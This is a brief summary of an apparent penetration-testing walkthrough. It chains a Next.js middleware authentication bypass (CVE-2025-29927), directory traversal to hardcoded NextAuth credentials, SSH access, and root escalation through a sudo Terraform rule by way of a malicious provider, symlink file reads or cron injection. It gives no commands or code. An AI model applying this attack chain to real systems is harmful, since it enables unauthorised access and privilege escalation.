A penetration testing walkthrough exploiting CVE-2025-29927, a NextJS middleware authentication bypass vulnerability, to access protected documentation. After bypassing authentication, a directory traversal flaw in the download API exposes NextAuth configuration files containing hardcoded credentials. These credentials grant SSH access as user jeremy. Privilege escalation to root is achieved by exploiting a misconfigured sudo rule that allows running Terraform with preserved environment variables, enabling three different attack paths: malicious provider configuration, arbitrary file read via symbolic links, and arbitrary file write through cron injection.
Sort: